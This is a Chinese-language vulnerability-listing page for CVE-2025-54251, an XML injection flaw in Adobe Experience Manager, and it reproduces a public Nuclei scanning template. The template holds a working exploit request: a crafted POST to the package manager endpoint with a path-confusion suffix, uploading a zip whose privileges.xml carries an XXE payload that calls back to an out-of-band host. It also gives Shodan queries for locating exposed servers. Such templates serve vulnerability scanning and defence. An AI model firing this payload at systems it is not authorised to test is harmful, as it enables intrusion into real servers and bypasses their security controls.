CVE-2025-54251: Adobe Experience Manager ≤ 6.5.23.0 - XML Injection

日期: 2025-08-01 | 影响软件: Adobe Experience Manager | POC: 已公开

漏洞描述

Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass.

PoC代码[已公开]

id: CVE-2025-54251

info:
  name: Adobe Experience Manager ≤ 6.5.23.0 - XML Injection
  author: DhiyaneshDK,assetnote
  severity: medium
  description: |
    Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass.
  reference:
    - https://github.com/assetnote/hopgoblin/blob/main/hopgoblin.py
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54251
    - https://helpx.adobe.com/security/products/experience-manager/apsb25-90.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2025-54251
    epss-score: 0.1714
    epss-percentile: 0.94726
    cwe-id: CWE-91
    cpe: cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: experience_manager
    shodan-query:
      - http.title:"aem sign in"
      - http.component:"adobe experience manager"
      - cpe:"cpe:2.3:a:adobe:experience_manager"
  tags: cve,2025,adobe,aem,xxe,oast,oob,intrusive,vuln,vkev

variables:
  marker: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"
  boundary: "{{hex_encode(rand_text_alphanumeric(32))}}"
  xxe_payload: '<!DOCTYPE x [<!ENTITY foo SYSTEM "http://{{interactsh-url}}/{{marker}}">]><x>&foo;</x>'

http:
  - raw:
      - |
        POST /crx/packmgr/service/exec.json;x='x/graphql/execute/json/x'?cmd=upload&jsonInTextarea=true HTTP/1.1
        Host: {{Hostname}}
        User-Agent: hopgoblin/1.0
        Content-Type: multipart/form-data; boundary={{boundary}}

        --{{boundary}}
        Content-Disposition: form-data; name="package"; filename="{{filename}}.zip"
        Content-Type: application/zip

        {{zip('META-INF/vault/privileges.xml',xxe_payload)}}
        --{{boundary}}--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(body,'success')"
          - "contains(interactsh_protocol, 'http')"
        condition: and
# digest: 490a004630440220374723281f78910fc48394b49fea40cc3f3a7786fd3d50fa4643a5684dd7dd0902203c342fec561e6c5c8b0fe3e05e8f8fbbc3367c6f235e34f35c2fcefbd468a957:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-54251.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐